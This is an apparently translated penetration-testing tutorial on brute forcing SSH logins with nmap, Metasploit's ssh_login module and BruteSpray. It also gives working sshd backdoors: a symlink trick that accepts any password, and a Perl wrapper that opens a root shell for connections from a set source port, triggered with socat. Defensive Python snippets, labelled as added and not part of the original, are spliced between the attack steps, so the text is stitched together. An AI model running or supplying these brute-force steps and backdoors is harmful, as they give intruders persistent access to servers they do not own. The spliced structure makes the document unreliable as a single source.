SSH (Secure Shell) is a security protocol developed by the IETF Network Working Group that operates at the application and transport layers. It provides security for remote login sessions and other network services, and can effectively prevent information leakage during remote management. SSH started as a program on UNIX systems and quickly spread to other operating platforms; used correctly, it can compensate for weaknesses in the network. SSH clients are available for many platforms, and SSH runs on almost all Unix systems, including HP-UX, Linux, AIX, Solaris, Digital Unix and others.
The Kali Linux penetration testing platform ships with the SSH service by default. To manage a server remotely over SSH you only need its IP address, port, an administrative account and the password. Network security follows the wooden barrel principle (the shortest plank sets the water level): as soon as SSH offers an opening, a whole new world opens up to the intruder.
The first is key-based authentication, which relies on a key pair: you create a pair of keys for yourself and place the public key on the server you need to access. When you connect to an SSH server, the client software sends the server a request to authenticate with your key. On receiving the request, the server looks for your public key in your home directory on the server and compares it with the public key you sent. If the two keys match, the server encrypts a "challenge" with the public key and sends it to the client software. The client software decrypts the challenge with your private key and returns the result to the server.
The second is password-based authentication: as long as you know the account and password you can log in to the remote host. All transmitted data is encrypted, but there is no guarantee that the server you are connecting to is the one you intend to connect to; another server may impersonate the real one, which is the "man-in-the-middle" attack. At the same time, if the server applies no other restrictions, such as limiting the login source IP or the number of failed login attempts, the password can be brute forced. So SSH is not absolutely secure: if the login source IP is not restricted and the number of login attempts is not limited, it will be cracked.
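What the unrestricted-attempts weakness described above looks like from the server side, as an added example that is not part of the original article: the script parses constructed sshd log lines in the CentOS /var/log/secure format and flags a source IP whose burst of failed passwords is followed by an accepted login. The IP addresses reuse the article's lab setup; the log lines, threshold and window are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd entries (CentOS /var/log/secure format); addresses match the article's lab.
SAMPLE_LOG = """\
Mar 10 10:01:02 centos sshd[2101]: Failed password for admin from 193.168.1.100 port 51234 ssh2
Mar 10 10:01:03 centos sshd[2103]: Failed password for admin from 193.168.1.100 port 51236 ssh2
Mar 10 10:01:03 centos sshd[2105]: Failed password for invalid user test from 193.168.1.100 port 51238 ssh2
Mar 10 10:01:04 centos sshd[2107]: Failed password for admin from 193.168.1.100 port 51240 ssh2
Mar 10 10:01:04 centos sshd[2109]: Failed password for admin from 193.168.1.100 port 51242 ssh2
Mar 10 10:01:05 centos sshd[2111]: Accepted password for admin from 193.168.1.100 port 51244 ssh2
Mar 10 10:30:00 centos sshd[2300]: Failed password for root from 10.0.0.7 port 40000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_sshd_line(line, year=2024):
    """Return (timestamp, result, user, ip), or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag IPs with >= threshold failures within window_seconds; an IP whose
    failures are followed by an 'Accepted' login is reported as 'compromised'."""
    failures = defaultdict(list)       # ip -> failure timestamps
    accepted_after = defaultdict(set)  # ip -> accounts accepted after failures
    for ts, result, user, ip in filter(None, map(parse_sshd_line, log_text.splitlines())):
        if result == "Failed":
            failures[ip].append(ts)
        elif ip in failures:
            accepted_after[ip].add(user)
    findings = {}
    for ip, times in failures.items():
        times.sort()
        # sliding window over sorted timestamps: any `threshold` failures inside the window
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window_seconds:
                status = "compromised" if accepted_after[ip] else "bruteforce"
                findings[ip] = {"status": status, "failures": len(times),
                                "accounts": sorted(accepted_after[ip])}
                break
    return findings
```

A single failed attempt from 10.0.0.7 stays below the threshold and is not reported, which is the point of the window: alert on bursts, not on one typo.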
Root privileges are obtained through remote command execution, for example a Struts vulnerability.
Root privileges are obtained through a web shell and privilege escalation.
A local file inclusion vulnerability allows reading any file on the Linux host.
Network access is obtained that can reach computers on the intranet.
The SSH port is open on the external network (default or changed port) and SSH is reachable.
In the preceding scenarios you can obtain the shadow file and brute force it to recover the passwords of these accounts, but in other scenarios no such vulnerability is available. In that case you need to brute force the SSH account directly.
Brute force the root account.
Use admin as the username for brute forcing.
Use the admin dictionary for password cracking.
Use the information already gathered to assemble a social engineering profile and generate a dictionary for brute forcing.
Comprehensively use and reuse the gathered information.
Master the process of brute forcing the SSH service with the ssh_login module in Metasploit to finally obtain the password.
Guest operating system: Kali Linux 1.1, IP address 193.168.1.100.
Server operating system: CentOS 6.5, IP address 193.168.1.26.
Tool software: Metasploit, Nmap.
Load the Kali Linux virtual machine, open a terminal in Kali and use nmap to scan the ports of the target 193.168.1.26 with the command nmap -v -A -Pn 193.168.1.26. Port 22 is found open, so a brute force attempt is possible. The result is shown in Figure 1 (Nmap scan results).
Parameter Description:
-v: enable verbose mode;
-A: aggressive scan, including detection of the target operating system;
-Pn: do not ping the target host, which reduces the chance of being discovered or blocked by a protective device.
Open another new command line window, type ssh admin@193.168.1.26 and enter an arbitrary password; access is denied. Repeat this process several times (3 or more) and you find that you can still keep trying passwords and the user is not locked out, as shown in Figure 2 (trying to log in), so all the conditions for a brute force attack are met.
Use the ssh_login module in Metasploit for cracking: open a terminal in Kali and enter msfconsole, as shown in Figure 3 (starting Metasploit).
Enter search ssh_login to find the ssh_login module, as shown in Figure 4 (searching for the ssh_login module).
Enter use auxiliary/scanner/ssh/ssh_login to load the ssh_login module, as shown in Figure 5 (loading the ssh_login module).
Enter show options to display the parameters of the ssh_login module, as shown in Figure 6 (ssh_login module parameters).
Explanation of important parameters:
RHOSTS: the target host IP address;
PASS_FILE: path of the password dictionary used for brute forcing;
USERNAME: the username to brute force;
STOP_ON_SUCCESS: stop the brute force attack as soon as a password is found.
Set the relevant parameters for the target host, as shown in Figure 7 (setting the parameters).
Enter exploit to start brute forcing; the password is found successfully and is admin888, as shown in Figure 8 (running the attack).
Open a terminal, enter ssh admin@193.168.1.26 and type the cracked password to log in to the server, as shown in Figure 9 (successful login to the server).
Enter commands to view information about the server, as shown in Figure 10 (running system commands).
BruteSpray takes the gnmap/XML output of an nmap scan and automatically calls Medusa to brute force the discovered services, which it does faster than hydra. BruteSpray relies on Medusa, which claims to support brute forcing accounts on the ssh, ftp, telnet, vnc, mssql, mysql, postgresql, rsh, imap, nntp, pcanywhere, pop3, rexec, rlogin, smbnt, smtp, svn and vmauthd protocols.
BruteSpray is not included in Kali Linux by default and must be installed manually. On some Kali installations you first need to run apt-get update before the install command:
apt-get install brutespray
On Kali the user and password dictionaries are installed by default under /usr/share/brutespray/wordlist.
git clone
cd brutespray
pip install -r requirements.txt
Note that in other environments Medusa must be installed as well, otherwise running BruteSpray will produce an error.
Usage: brutespray.py [-h] -f FILE [-o OUTPUT] [-s SERVICE] [-t THREADS] [-T HOSTS] [-U USERLIST] [-P PASSLIST] [-u USERNAME] [-p PASSWORD] [-c] [-i]
Usage: python brutespray.py <options>
Option parameters:
-h, --help: display help information and exit
Menu options:
-f FILE, --file FILE: the GNMAP or XML file output by nmap to parse
-o OUTPUT, --output OUTPUT: directory in which successful attempts are recorded
-s SERVICE, --service SERVICE: the service to attack
-t THREADS, --threads THREADS: number of Medusa threads
-T HOSTS, --hosts HOSTS: number of hosts tested at the same time
-U USERLIST, --userlist USERLIST: user dictionary file
-P PASSLIST, --passlist PASSLIST: password dictionary file
-u USERNAME, --username USERNAME: a single username to use
-p PASSWORD, --password PASSWORD: a single password to use
-c, --continuous: keep going after a success
-i, --interactive: interactive mode
python brutespray.py --file nmap.xml -i
After execution the program automatically identifies the services in the nmap results; following the prompts you then choose the services to crack, the number of threads, the number of hosts to attack simultaneously, and the user and password files. BruteSpray prints "SUCCESS" on screen when a credential is found.
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=33223;
This classic backdoor creates a soft link to sshd and starts it on another port; one then connects with ssh root@x.x.x.x -p 33223 and logs in with any password. But this is very weak, and protection scripts such as Rootkit Hunter can detect it.
cd /usr/sbin
mv sshd ../bin
vi sshd  // add the following and save
#!/usr/bin/perl
exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);
exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV;
chmod 755 sshd
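A defender's check for the two sshd tampering methods just shown, as an added example that is not part of the article: the real sshd must be an ELF binary rather than a script wrapper, and no stray symlink such as /tmp/su should resolve to it. The code runs against a constructed temp-directory layout that mirrors the article's /usr/sbin/sshd, /usr/bin/sshd and /tmp/su paths, not against the live system.

```python
import os
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
SCRIPT_MARKERS = (b"#!", b"getpeername", b"exec ", b"/bin/sh")

def audit_sshd_binary(path):
    """Return findings for the file that should be the real sshd binary.
    A genuine sshd is an ELF executable; the wrapper trick above leaves a
    script (shebang + exec of the relocated binary) in its place."""
    p = Path(path)
    findings = []
    if p.is_symlink():
        findings.append(f"{p} is a symlink to {os.readlink(p)}")
    head = p.read_bytes()[:4096]
    if not head.startswith(ELF_MAGIC):
        findings.append(f"{p} is not an ELF binary (header {head[:16]!r})")
        findings += [f"{p} contains script marker {m!r}" for m in SCRIPT_MARKERS if m in head]
    return findings

def find_sshd_links(search_dirs, sshd_path):
    """Find symlinks under search_dirs that resolve to the sshd binary
    (the '/tmp/su -> sshd' style of backdoor that rkhunter also flags)."""
    target = Path(sshd_path).resolve()
    hits = []
    for d in search_dirs:
        for root, dirs, files in os.walk(d):
            for name in files + dirs:
                fp = Path(root, name)
                if fp.is_symlink() and fp.resolve() == target:
                    hits.append(str(fp))
    return sorted(hits)

def demo():
    """Build a constructed lab layout in a temp dir and audit it.
    Paths mirror the article (/usr/sbin/sshd, /usr/bin/sshd, /tmp/su) but live under tmp."""
    with tempfile.TemporaryDirectory() as tmp:
        sbin, bin_, tmpdir = (Path(tmp, d) for d in ("usr/sbin", "usr/bin", "tmp"))
        for d in (sbin, bin_, tmpdir):
            d.mkdir(parents=True)
        (bin_ / "sshd").write_bytes(ELF_MAGIC + b"\0" * 60)  # stand-in for the relocated real sshd
        # constructed stand-in for a wrapper script left at the real sshd's path
        (sbin / "sshd").write_text('#!/usr/bin/perl\nexec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV;\n')
        (tmpdir / "su").symlink_to(bin_ / "sshd")
        return {"wrapper": audit_sshd_binary(sbin / "sshd"),
                "clean": audit_sshd_binary(bin_ / "sshd"),
                "links": find_sshd_links([tmpdir, sbin], bin_ / "sshd")}
```

On a real host the same two functions would be pointed at /usr/sbin/sshd and at directories such as /tmp and /dev/shm, and the result compared with the package manager's recorded file hash.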
socat STDIO TCP4:target_ip:22,sourceport=19526
If socat is not installed, download, compile and install it:
wget
tar -zxvf socat-1.7.3.2.tar.gz
cd socat-1.7.3.2
./configure
make
make install
On the local computer generate a public/private key pair, append the public key to ~/.ssh/authorized_keys on each server you need to connect to, and set the correct permissions; you can then log in to the server without a password.
chmod 600 ~/.ssh/authorized_keys
Comparing the SSH brute force tests of the tools hydra, medusa, patator, BruteSpray and Metasploit, the summary is as follows:
Every tool successfully cracked the SSH account and password.
Patator and BruteSpray are written in Python, but BruteSpray requires Medusa.
Hydra and medusa are written in C and need to be compiled.
BruteSpray brute forces based on the results of an nmap scan, which works well after scanning an intranet.
Patator is Python-based, fast and portable; it can be used on Windows or Linux.
If Kali or PentestBox is available, using Metasploit for SSH brute forcing is also a good option.
BruteSpray automatically writes successful cracks to the log file /brutespray-output/ssh-success.txt; hydra with the parameter "-o save.log" records successful cracks to save.log; medusa with the parameter "-O ssh.log" records them to ssh.log; and patator can be given "-x ignore:mesg='Authentication failed.'" to ignore failed attempts and show only successes.